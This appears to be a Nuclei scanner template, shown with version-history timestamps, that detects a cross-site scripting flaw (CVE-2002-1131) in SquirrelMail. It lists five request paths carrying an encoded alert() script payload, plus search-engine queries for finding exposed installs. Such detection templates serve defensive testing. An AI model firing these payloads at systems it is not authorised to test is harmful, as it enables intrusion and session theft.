2021-11-15 18:09:04 +00:00
id : CVE-2002-1131
info :
2022-08-16 14:14:41 +00:00
name : SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
2021-11-15 18:09:04 +00:00
author : dhiyaneshDk
2023-07-11 19:49:27 +00:00
severity : high
2022-08-16 14:14:41 +00:00
description : The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability.
2022-04-22 10:38:41 +00:00
reference :
2022-07-01 10:02:07 +00:00
- http://www.redhat.com/support/errata/RHSA-2002-204.html
- http://www.debian.org/security/2002/dsa-191
- http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
2022-04-22 10:38:41 +00:00
- https://www.exploit-db.com/exploits/21811
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2002-1131
2022-04-01 08:51:42 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score : 7.5
2022-04-01 08:51:42 +00:00
cve-id : CVE-2002-1131
2023-07-11 19:49:27 +00:00
cwe-id : CWE-80
epss-score : 0.06018
2024-01-29 17:11:14 +00:00
epss-percentile : 0.92781
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 5
2023-07-11 19:49:27 +00:00
vendor : squirrelmail
product : squirrelmail
2024-05-31 19:23:20 +00:00
shodan-query : http.title:"squirrelmail"
fofa-query : title="squirrelmail"
google-query : intitle:"squirrelmail"
2024-01-14 09:21:50 +00:00
tags : cve,cve2002,edb,xss,squirrelmail
2021-11-15 18:09:04 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-15 18:09:04 +00:00
- method : GET
path :
2021-11-16 10:10:56 +00:00
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-11-15 18:09:04 +00:00
2021-11-16 10:10:56 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2021-11-15 18:09:04 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2021-11-16 10:10:56 +00:00
words :
- "</script><script>alert(document.domain)</script>"
2021-11-15 18:09:04 +00:00
- type : word
2021-11-16 10:10:56 +00:00
part : header
2021-11-15 18:09:04 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 490a00463044022079f74e17066a8030a2ff5a3ea6fa4258ba6ec59353823c400a4f933c88b091020220765e9a7f5973726aebe82162e0dc3565fd9f7f6fa15e4f417d5bdd2c0696de1e:922c64590222798bb761d5b6d8e72950